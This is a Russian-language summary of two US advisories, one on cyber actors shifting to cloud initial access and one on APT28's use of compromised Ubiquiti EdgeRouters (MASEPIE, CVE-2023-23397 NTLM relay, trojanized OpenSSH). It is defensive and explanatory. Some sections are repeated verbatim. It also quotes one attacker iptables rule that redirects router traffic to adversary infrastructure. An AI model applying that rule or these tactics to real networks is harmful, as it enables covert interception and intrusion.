Документ под названием «cyber actors adapt tactics for initial cloud access», опубликованный Агентством национальной безопасности (АНБ) предупреждает, об адаптации тактики для получения первоначального доступа к облачным сервисам, а не для использования уязвимостей локальной сети.

Документ содержит ценную информацию и рекомендации для организаций по защите от кибер-профессионалов, нацеленных на облачные сервисы. Однако динамичный характер киберугроз и сложность облачных сред означают, что организации должны постоянно обновлять свои методы обеспечения безопасности, а не полагаться исключительно на статические рекомендации.

Преимущества:

📌 Осведомлённость: документ повышает осведомлённость об изменении тактики в сторону облачных сервисов, что имеет решающее значение для понимания организациями текущего ландшафта угроз.

📌 Подробные TTP: он предоставляет подробную информацию о тактиках, методах и процедурах (TTP), используемых участниками, включая использование сервисных и неактивных учётных записей, что может помочь организациям выявить потенциальные угрозы и уязвимости.

📌 Секторальная информация: описывается расширение охват таких секторов, как авиация, образование, правоохранительные органы и военные организации, предлагая отраслевую информацию, которая может помочь этим отраслям укрепить свою обороноспособность.

📌Стратегии смягчения последствий: предлагает практические стратегии смягчения последствий, которые организации могут реализовать для усиления своей защиты от первоначального доступа со стороны субъектов, таких как внедрение MFA и управление системными учётными записями.

Недостатки:

📌Внедрение многофакторную аутентификацию (MFA). MFA — это один из наиболее эффективных способов защиты учётных записей пользователей от компрометации. Требуя несколько форм проверки, MFA значительно затрудняет злоумышленникам получение несанкционированного доступа, даже если они получили учётные данные пользователя.

📌Регулярная установка исправлений и обновлений. Поддержание актуальности программного обеспечения и систем с использованием последних исправлений имеет решающее значение для устранения брешей в безопасности, которыми могут воспользоваться злоумышленники. Должен быть установлен регулярный процесс управления исправлениями, чтобы обеспечить своевременное применение обновлений.

📌Сегментация сети. Разделение сети на более мелкие контролируемые сегменты ограничивает возможность злоумышленника перемещаться внутри сети и получать доступ к конфиденциальным областям. Сегментация также помогает сдерживать потенциальные нарушения в меньшем подмножестве сети.

📌Защита конечных точек. Развёртывание расширенных решений для защиты конечных точек может помочь обнаружить и предотвратить вредоносные действия на устройствах, имеющих доступ к сети организации. Это включает в себя использование антивирусного программного обеспечения, систем предотвращения вторжений на базе хоста и инструментов обнаружения и реагирования на конечных точках (EDR).

📌Обучение по вопросам безопасности. Обучение сотрудников рискам и передовым методам кибербезопасности имеет важное значение для предотвращения атак социальной инженерии, таких как фишинг. Регулярное обучение может помочь создать культуру осведомлённости о безопасности внутри организации.

📌Контроль доступа с наименьшими привилегиями. Обеспечение пользователей только правами доступа, необходимыми для их роли, помогает минимизировать потенциальное воздействие компрометации учётной записи. Средства контроля доступа должны регулярно пересматриваться и корректироваться по мере необходимости.

📌Планирование реагирования на инциденты. Наличие чётко определённого и проверенного плана реагирования на инциденты позволяет организациям быстро и эффективно реагировать на инциденты безопасности, сводя к минимуму ущерб и восстанавливая операции как можно скорее.

📌Непрерывный мониторинг и обнаружение. Реализация возможностей непрерывного мониторинга и обнаружения может помочь выявить подозрительные действия на раннем этапе. Сюда входит использование систем управления информацией о безопасности и событиями (SIEM), систем обнаружения вторжений (IDS) и анализа сетевого трафика.

Отмечался высокий уровень сложности атак, что отражает глубокое понимание киберландшафта и способность адаптироваться в условиях меняющихся мер безопасности. Эта изощрённость очевидна не только в технических возможностях, но и в их стратегическом подходе к кибершпионажу, который включает в себя тщательный выбор целей, планирование и использование передовых тактик, методов и процедур (TTP).

Техническое мастерство и инновации

Кибероперации характеризуются использованием специального вредоносного ПО и уязвимостей нулевого дня. Эксплуатация этих уязвимостей позволяет эффективно проникать, например chain-атака SolarWinds, в результате которой был нарушен процесс разработки ПО путём внедрения вредоноснго кода в обновление ПО, что затронуло клиентов, включая правительственные учреждения и компании из списка Fortune 500.

OpSec и скрытность

OpSec является отличительной чертой операций, и атакующие делают все возможное, чтобы замести следы и сохранить скрытность в скомпрометированных сетях. Это включает в себя использование зашифрованных каналов для кражи данных, тщательное управление серверами управления и контроля во избежание обнаружения, а также использование легитимных инструментов и услуг (LOTL), чтобы гармонировать с обычной сетевой деятельностью. Способность вести себя сдержанно в целевых сетях часто позволяет им проводить долгосрочные шпионские операции без обнаружения.

Тактика психологической и социальной инженерии

Помимо технических возможностей, он продемонстрировал искусность в тактике психологической и социальной инженерии. Эти методы предназначены для манипулирования людьми с целью разглашения конфиденциальной информации или выполнения действий, ставящих под угрозу безопасность. Фишинговые кампании, целевой фишинг и другие формы социнженерии часто используются для получения первоначального доступа к целевым сетям или для повышения привилегий внутри них.

Выбор цели и сбор разведданных

Эксплуатация сервисных и неактивных учётных записей кибер-профессионалами представляет собой изощренный и часто упускаемый из виду вектор кибератак. Эти учётные записи, созданные для различных операционных целей в облачных и локальных средах организации, могут предоставить злоумышленникам доступ, необходимый им для достижения своих целей, если они не управляются и не защищаются должным образом.

Учётные записи служб — это специализированные учётные записи, используемые приложениями или службами для взаимодействия с операционной системой или другими службами. Они часто имеют повышенные привилегии для выполнения определённых задач и могут не быть привязаны к личности отдельного пользователя. С другой стороны, неактивные учётные записи — это учётные записи пользователей, которые больше не используются либо потому, что пользователь покинул организацию, либо потому, что цель учётной записи была достигнута. Эти учётные записи особенно опасны, поскольку о них часто забывают, им оставляют больше привилегий, чем необходимо, и они не контролируются так тщательно, как активные учётные записи пользователей.

Почему служебные и неактивные учётные записи подвергаются атаке

📌Повышенные привилегии. Учётные записи служб имеют повышенные привилегии, необходимые для системных задач, которые можно использовать для получения широкого доступа к сети организации.

📌Отсутствие мониторинга. Неактивные учётные записи используются нерегулярно, что снижает вероятность их отслеживания на предмет подозрительной активности делает их привлекательной целью для злоумышленников.

📌Слабые учётные данные или учётные данные по умолчанию. Учётные записи служб могут быть настроены со слабыми учётными данными или учётными данными по умолчанию, которые проще найти с помощью атак методом перебора.

📌Обход аналитики поведения пользователей. Поскольку учётные записи служб выполняют автоматизированные задачи, их модели поведения могут быть предсказуемыми, что позволяет вредоносным действиям сливаться с обычными операциями и уклоняться от обнаружения.

Угроза, которую представляют скомпрометированные учётные записи

Смещение акцента кибер-профессионалов на облачные сервисы вывело важность обеспечения первоначального доступа на передний план. В облачных средах первоначальный доступ представляет собой критический момент, когда безопасность всей системы становится наиболее уязвимой. В отличие от традиционных локальных сетей, доступ к облачным сервисам осуществляется через Интернет, что делает начальную точку входа основной целью для злоумышленников.

Первоначальный доступ как плацдарм для злоумышленников

Получение первоначального доступа к облачным сервисам позволяет злоумышленникам закрепиться в целевой среде с последующим повышением привилегий, распространения по сети и получения доступа к конфиденциальным данным. Распределённый характер облачных сервисов также означает, что компрометация одной учётной записи может потенциально предоставить доступ к широкому спектру ресурсов и данных.

Проблемы в обеспечении первоначального доступа

📌Удалённый доступ. Облачные сервисы предназначены для удалённого доступа, что увеличивает поверхность атаки.

📌Управление идентификацией и доступом (IAM). В облачных средах IAM становится важнейшим компонентом безопасности. Организации должны обеспечить надёжность политик IAM и предоставление разрешений на основе принципа наименьших привилегий, чтобы минимизировать риск первоначального доступа со стороны неавторизованных лиц.

📌Фишинг и социнженерия. используются методы фишинга и социальной инженерии для получения первоначального доступа. Эти методы используют человеческий фактор, а не технические уязвимости, что затрудняет защиту от них с помощью традиционных мер безопасности.

Примеры методов первоначального доступа

Возросшая важность первоначального доступа в облачной безопасности

Смещение акцента кибер-профессионалов на облачные сервисы вывело важность обеспечения первоначального доступа на передний план. В облачных средах первоначальный доступ представляет собой критический момент, когда безопасность всей системы становится наиболее уязвимой. В отличие от традиционных локальных сетей, доступ к облачным сервисам осуществляется через Интернет, что делает начальную точку входа основной целью для злоумышленников.

Первоначальный доступ как плацдарм для злоумышленников

Получение первоначального доступа к облачным сервисам позволяет злоумышленникам закрепиться в целевой среде с последующим повышением привилегий, распространения по сети и получения доступа к конфиденциальным данным. Распределённый характер облачных сервисов также означает, что компрометация одной учётной записи может потенциально предоставить доступ к широкому спектру ресурсов и данных.

Проблемы в обеспечении первоначального доступа

📌Удалённый доступ. Облачные сервисы предназначены для удалённого доступа, что увеличивает поверхность атаки.

📌Управление идентификацией и доступом (IAM). В облачных средах IAM становится важнейшим компонентом безопасности. Организации должны обеспечить надёжность политик IAM и предоставление разрешений на основе принципа наименьших привилегий, чтобы минимизировать риск первоначального доступа со стороны неавторизованных лиц.

📌Фишинг и социнженерия. используются методы фишинга и социальной инженерии для получения первоначального доступа. Эти методы используют человеческий фактор, а не технические уязвимости, что затрудняет защиту от них с помощью традиционных мер безопасности.

В изменяющемся кибер-ландшафте адаптация к целевым облачным сервисам подчёркивает кардинальный сдвиг в тактике кибершпионажа. Переход от использования уязвимостей локальной сети к прямому нацеливанию на облачные инфраструктуры знаменует собой значительную эволюцию киберугроз. В основе этого лежит решающая роль аутентификации как ключевого шага в защите облачных сетей от кибер-профессионалов.

Важность аутентификации в облачных средах

Аутентификация служит шлюзом к облачным сервисам, определяя, следует ли предоставить доступ пользователю или системе. В облачных средах, где ресурсы и данные размещаются за пределами предприятия и доступны через Интернет, невозможно переоценить важность надёжных механизмов аутентификации. В отличие от традиционных локальных систем, где есть меры физической безопасности и внутренняя сетевая защита, облачные сервисы по своей сути более подвержены воздействию Интернета. Такая уязвимость делает начальный этап аутентификации не просто мерой безопасности, а критически важным механизмом защиты от несанкционированного доступа.

Проблемы облачной аутентификации

Переход к облачным сервисам приносит с собой уникальные проблемы в реализации эффективных стратегий аутентификации. Пользователи получают доступ к облачным сервисам из разных мест, устройств и сетей, что требует эффективных механизмов аутентификации.

Масштабируемость облачных сервисов означает, что механизмы аутентификации должны быть в состоянии обрабатывать большое количество запросов на доступ без значительных задержек и ухудшения пользовательского опыта. Это требование масштабируемости и удобства для пользователя часто противоречит необходимости строгих мер безопасности, создавая хрупкий баланс, который должны соблюдать организации.

Стратегии усиления облачной аутентификации

📌Многофакторная аутентификация (MFA). MFA добавляет дополнительный уровень безопасности, требуя от пользователей предоставления двух или более факторов проверки для получения доступа. Подход снижает риск несанкционированного доступа, поскольку значительно сложнее получить несколько факторов аутентификации.

📌Доступ к учётным данным / подбор пароля T1110: используются password-spray и подбор паролей в качестве начальных векторов заражения. Подход предполагает попытку ввода нескольких паролей для разных учётных записей или многочисленные попытки для одной учётной записи для получения несанкционированного доступа.

📌Первоначальный доступ / T1078.004 Действительные учётные записи: Облачные учётные записи: получение доступа к облачным сервисам, используя скомпрометированные учётные данные: как системные учётные записи (используемые для автоматизированных задач и служб), так и неактивные учётные записи, учётные которые все ещё остаются в системе.

📌Доступ к учётным данным / T1528 Кража токена доступа к приложению: злоумышленники используют украденные токены доступа для входа в учётные записи без необходимости ввода паролей. Токены доступа — это цифровые ключи, которые позволяют получить доступ к учётным записям пользователей. Их получение позволяет обойти традиционные механизмы входа в систему.

📌Доступ к учётным данным / Формирование запроса многофакторной аутентификации T1621: метод «бомбардировка MFA» предполагает, что злоумышленники неоднократно отправляют запросы MFA на устройство жертвы. Цель состоит в том, чтобы жертва приняла запрос и таким образом предоставила злоумышленнику доступ.

📌Командование и контроль / T1090.002 Прокси: Внешний прокси: чтобы поддерживать «тайные операции и сливаться с обычным трафиком», используются открытые прокси, расположенные в частных диапазонах IP-адресов, т. к. вредоносные соединения сложнее отличить от легальной активности пользователей в журналах доступа.

📌Успешная регистрация устройства может обеспечить постоянный доступ к облачной среде.

Доступ через сервисные и спящие учётные записи

Одна из ключевых стратегий, применяемых злоумышленниками, предполагает нацеливание на сервисные и неактивные учётные записи в облачных средах. Учётные записи служб используются для запуска приложений и служб и управления ими без прямого взаимодействия с человеком. Эти учётные записи особенно уязвимы, поскольку их часто невозможно защитить с помощью многофакторной аутентификации (MFA), и они могут иметь высокопривилегированный доступ в зависимости от их роли в управлении приложениями и службами. Получив доступ к этим учётным записям, злоумышленники могут получить привилегированный первоначальный доступ к сети, которую они используют в качестве стартовой площадки для дальнейших операций.

📌Адаптация к облачным сервисам: сместился фокус с эксплуатации уязвимостей локальной сети на прямое воздействие на облачные сервисы. Это изменение является ответом на модернизацию систем и миграцию инфраструктуры в облако.

📌Аутентификация как ключевой шаг: чтобы скомпрометировать облачные сети, необходимо успешно пройти аутентификацию у поставщика облачных услуг. Предотвращение этого первоначального доступа имеет решающее значение для предотвращения компрометации.

📌Расширение таргетинга: расширена сфера воздействия на сектора, такие как, как авиация, образование, правоохранительные органы, региональные и федеральные организации, правительственные финансовые департаменты и военные организации. Это расширение указывает на стратегическую диверсификацию целей сбора разведывательной информации.

📌Использование служебных и неактивных учётных записей: подчёркивается, что за последние 12 месяцев использовались брутфорс-атаки для доступа к служебным и неактивным учётным записям. Эта тактика позволяет получить первоначальный доступ к облачным средам.

📌Профессиональный уровень атакующих: выявлена возможность осуществления компрометациии глобальной цепочки поставок, как, например, инцидент с SolarWinds в 2020 году.

📌Первая линия защиты: подчёркивается, что первая линия защиты включает предотвращения возможности первичного доступа к сервисам.

Документ под названием «cyber actors adapt tactics for initial cloud access», опубликованный Агентством национальной безопасности предупреждает, об адаптации тактики для получения первоначального доступа к облачным сервисам, а не для использования уязвимостей локальной сети.

Переход от локальных решений к облачным является ответом на то, что организации модернизируют свои системы и переходят на облачную инфраструктуру. Также кибер-кампании расширяются в сторону таких секторов, как авиация, образование, секторов, связанных региональными и федеральными, а также госучреждениями, правительственными финансовыми департаментами и военными организациями.

Реальность такова, что для взлома облачных сетей нужно только пройти аутентификацию у поставщика облачных услуг, и в случае успеха, защита будет преодолена. Другими словами, «неожиданный» аспект облачных сред: меньшая уязвимость сети по сравнению с локальными системами парадоксальным образом делает преодоление первоначального доступа наиболее эффективным.

За последний год наблюдаемые TTPs были простыми, и вместе с тем эффективными так как использовались служебные и бездействующие учётные записи. В целом публикация вызывает прохладное утешение, предполагая, что прочная основа основ безопасности всего лишь гонка на опережение специалистов по безопасности с атакующими.

Ключевые выводы

Адаптация к облачным сервисам: сместился фокус с эксплуатации уязвимостей локальной сети на прямое воздействие на облачные сервисы. Это изменение является ответом на модернизацию систем и миграцию инфраструктуры в облако.

📌Аутентификация как ключевой шаг: чтобы скомпрометировать облачные сети, необходимо успешно пройти аутентификацию у поставщика облачных услуг. Предотвращение этого первоначального доступа имеет решающее значение для предотвращения компрометации.

📌Расширение таргетинга: расширена сфера воздействия на сектора, такие как, как авиация, образование, правоохранительные органы, региональные и федеральные организации, правительственные финансовые департаменты и военные организации. Это расширение указывает на стратегическую диверсификацию целей сбора разведывательной информации.

В декабре 2023 года APT28 разработали MASEPIE, небольшой бэкдор на Python, способный выполнять произвольные команды на машинах-жертвах. Расследование ФБР показало, что скомпрометированные Ubiquiti EdgeRouters были использованы в качестве C2-инфраструктуры для бэкдоров MASEPIE.

C2 инфраструктура

Хотя APT28 не развёртывает MASEPIE на самих EdgeRouters, скомпрометированные маршрутизаторы использовались в качестве инфраструктуры C2 для связи с бэкдорами MASEPIE и контроля над ними, установленными в системах, принадлежащих целевым лицам и организациям.

Данные, отправляемые на EdgeRouters, действующие как серверы C2, были зашифрованы с использованием случайно сгенерированного 16-символьного ключа AES, для затруднения обнаружения и анализа трафика.

Функциональность бэкдора MASEPIE

MASEPIE — это бэкдор на основе Python, который позволяет выполнять произвольные команды в заражённых системах. Этот бэкдор предоставляет возможности удалённого управления для выполнения действий:

📌 эксфильтрация данных

📌 распространение внутри скомпрометированной сети

Прокси-сервер и туннельная инфраструктура

APT28 использовали скомпрометированные Ubiquiti EdgeRouters для установления прокси-соединений и SSH-туннелей к подконтрольной инфраструктуре для поддержания постоянного доступа и контроля над скомпрометированными устройствами даже после смены пароля или других попыток взлома.

Reverse proxy-подключения

Были использованы правила iptables в EdgeRouters для установления подключений, например:

iptables -t nat -I PREROUTING -d <router IP address> -p tcp -m tcp --dport 4443 -j DNAT -to-destination <APT28 dedicated infrastructure>: 10081

Это правило iptables перенаправляет входящий трафик через порт 4443 EdgeRouter в выделенную инфраструктуру на порту 10081.

Reverse SSH-туннели

Кроме того, APT28 загрузили контролируемые SSH-RSA-ключи на скомпрометированные EdgeRouters для создания SSH-туннелей. Эти туннели позволяют получать доступ к скомпрометированным устройствам даже после смены пароля или других попыток взлома.

APT28 использовали CVE-2023–23397, уязвимость с критическим повышением привилегий в Microsoft Outlook в Windows, для облегчения утечки учётных данных NTLMv2. Эта 0day-уязвимость позволяет передавать хэши Net-NTLMv2 в подконтрольную инфраструктуру.

Для использования CVE-2023–23397 и сбора учётных данных NTLMv2 использованы два общедоступных инструмента:

📌 http://ntlmrelayx.py: инструмент является частью Impacket suite, набора классов Python для работы с сетевыми протоколами. APT28 использовали http://ntlmrelayx.py для выполнения relay-атак NTLM [T1557] и облегчения утечки учётных данных NTLMv2.

📌 Responder: инструмент, предназначенный для сбора и передачи хэшей NTLMv2 путём настройки подконтрольного сервера аутентификации [T1556] для сбора учётных данных NTLMv2 от целевых учётных записей Outlook.

Безопасники могут выполнять поиск файлов журналов, а также наличия http://ntlmrelayx.py и Responder.db, Responder-Session.log для выявления потенциальной активности, связанной с эксплуатацией CVE-2023–23397.

Смягчение последствий

Чтобы снизить риск использования CVE-2023–23397 и утечки учётных данных NTLMv2 следует предпринять следующие шаги:

📌 Применение исправления Microsoft: Microsoft выпустила исправление для CVE-2023–23397.

APT28 размещали скрипты Python на скомпрометированных Ubiquiti EdgeRouters для сбора и проверки украденных учётных данных учётной записи веб-почты. Эти сценарии обычно хранятся вместе со связанными файлами журналов в домашнем каталоге скомпрометированного пользователя, например:

📌 /home/<compromised user>/srv/http://core.py

📌 /home/<compromised user>/srv/debug.txt

ФБР заявило о восстановлении подробных файлов журналов, содержащие информацию об активности APT28 на скомпрометированных EdgeRouters.

Пользовательские скрипты на Python

📌 Размещённые крипты Python служат для сбора и проверки украденных данных учётной записи веб-почты. APT28 используют эти скрипты как часть своих операций сбора учётных данных, нацеленных на конкретных пользователей веб-почты.

📌 Скрипты предназначены для автоматического устранения проблем с капчей на страницах входа в веб-почту, позволяя атакующим обойти эту меру безопасности и получить несанкционированный доступ к целевым учётным записям. Чтобы достичь этого, скрипты устанавливают соединения с API endpoint api[.]anti-captcha[.]com, который используется APT28 для решения проблем с капчей.

Yara-правила для обнаружения

APT28 использовали учётные данные по умолчанию и троянизированные серверные процессы OpenSSH для доступа к Ubiquiti EdgeRouters, связанеые с Moobot, ботнетом на базе Mirai, который заражает устройства Интернета вещей (IoT) с использованием уязвимостей, которые можно использовать удалённо, таких как слабые пароли или пароли по умолчанию.

Троянские файлы OpenSSH-сервера

Троянские бинарные OpenSSH, загруженные с packinstall[.]kozow [.]com, заменили оригинальные бинарные файлы на EdgeRouters с целью удалённо обходить аутентификацию и получать несанкционированный доступ к скомпрометированным маршрутизаторам.

Ботнет Moobot известен своей способностью использовать уязвимости в устройствах Интернета вещей, особенно с ненадёжными паролями или паролями по умолчанию. Заменяя законные двоичные файлы сервера OpenSSH троянскими версиями, APT28 могут поддерживать постоянный доступ к скомпрометированным EdgeRouters и использовать их в различных вредоносных целях.

Ботнет на базе Mirai

Moobot — это ботнет на базе Mirai и является производным от Mirai, которая впервые появилась в 2016 году. Mirai был предназначен для сканирования и заражения IoT-устройств путём использования распространённых уязвимостей и учётных данных по умолчанию. Как только устройство заражено, оно становится частью ботнета и может использоваться для распределённых атак типа «отказ в обслуживании» (DDoS), credential stuffing и других вредоносных действий.

Воздействие на маршрутизаторы EdgeRouters

При наличии троянизированных процессов OpenSSH APT28 могут поддерживать постоянный доступ к скомпрометированным маршрутизаторы и использовать их в качестве платформы для вредоносных действий:

Операции были нацелены на различные отрасли, включая аэрокосмическую и оборонную, образование, энергетику и коммунальные услуги, госсектор, гостиничный бизнес, нефть и газ, розничную торговлю, технологии и транспорт. Целевые страны включают Чешскую Республику, Италию, Литву, Иорданию, Черногорию, Польшу, Словакию, Турцию, Объединённые Арабские Эмираты и США

Потенциальные последствия воздействия включают:

📌 Утечка данных и кража конфиденциальной информации, интеллектуальной собственности или коммерческой тайны.

📌 Нарушение работы критически важных объектов инфраструктуры, таких как электросети, транспортные системы или производственные процессы.

📌 Компрометация правительственных сетей и систем, потенциально ведущая к шпионажу или угрозам национальной безопасности.

📌 Финансовые потери из-за сбоев в работе, кражи данных клиентов или ущерба репутации.

📌 Потенциальные риски для безопасности в случае взлома систем управления или сетей операционных технологий (OT).

📌 Потеря доверия клиентов и доверия к пострадавшим организациям.

Документ под названием «Cyber Actors Use Compromised Routers to Facilitate Cyber Operations», опубликованный ФБР, АНБ, киберкомандованием США и международными партнёрами предупреждает об использовании скомпрометированных маршрутизаторов Ubiquiti EdgeRouters для облегчения вредоносных киберопераций по всему миру.

Популярность Ubiquiti EdgeRouters объясняется удобной в использовании ОС на базе Linux, учётными данными по умолчанию и ограниченной защитой брандмауэром. Маршрутизаторы часто поставляются с небезопасными конфигурациями по умолчанию и не обновляют прошивку автоматически.

Скомпрометированные EdgeRouters использовались APT28 для сбора учётных данных, NTLMv2, сетевого трафика прокси-сервера и размещения целевых страниц для фишинга и пользовательских инструментов. APT28 получила доступ к маршрутизаторам, используя учётные данные по умолчанию, и троянизировала серверные процессы OpenSSH. Наличие root-доступ к скомпрометированным маршрутизаторам, дало доступ к ОС для установки инструментов и сокрытия своей личности.

APT28 также развернула пользовательские скрипты Python на скомпрометированных маршрутизаторах для сбора и проверки украденных данных учётной записи веб-почты, полученных с помощью межсайтовых скриптов и кампаний фишинга «браузер в браузере». Кроме того, они использовали критическую уязвимость с повышением привилегий на нулевой день в Microsoft Outlook (CVE-2023–23397) для сбора данных NTLMv2 из целевых учётных записей Outlook и общедоступные инструменты для оказания помощи в NTLM-атаках

Ключевые моменты

📌 APT28 (известные как Fancy Bear, Forest Blizzard и Strontium) использовали скомпрометированные серверы Ubiquiti EdgeRouters для проведения вредоносных киберопераций по всему миру.

📌 Эксплуатация включает сбор учётных данных, сбор дайджестов NTLMv2, проксирование сетевого трафика, а также размещение целевых страниц для фишинга и пользовательских инструментов.

📌 ФБР, АНБ, киберкомандование США и международные партнеры выпустили совместное консультативное заключение по кибербезопасности (CSA) с подробным описанием угрозы и рекомендациями по ее устранению.

Последствия атак на маршрутизаторы

📌 Распространённые уязвимости: Значительное количество уязвимостей, всего около 226 в совокупности представляют существенную угрозу безопасности.

📌 Устаревшие компоненты: Основные компоненты, такие как ядро Linux, и дополнительные службы, такие как VPN, устарели, что делает их уязвимыми для известных эксплойтов.

📌 Пароли по умолчанию и незашифрованные соединения: Многие маршрутизаторы поставляются с легко угадываемыми паролями по умолчанию и используют незашифрованные соединения, которыми могут легко воспользоваться злоумышленники.

📌 Скомпрометированные устройства и данные: После взлома маршрутизатора все устройства, защищенные его брандмауэром, становятся уязвимыми, позволяя злоумышленникам отслеживать, перенаправлять, блокировать или изменять данные.

📌 Риск для критической инфраструктуры: скомпрометированные маршрутизаторы SOHO могут использоваться для атаки на критическую инфраструктуру США, потенциально нарушая работу основных служб в секторах связи, энергетики, транспорта и водоснабжения.

📌 Отказ в обслуживании и перехват трафика: Уязвимости в протоколах могут приводить к атакам типа «отказ в обслуживании» против служб хоста и перехвату как внутреннего, так и внешнего трафика.

📌 Перехват и кибератаки: Злоумышленники могут перехватывать трафик и запускать дальнейшие сетевые атаки, затрудняя пользователям обнаружение взлома из-за минимальных пользовательских интерфейсов маршрутизатора.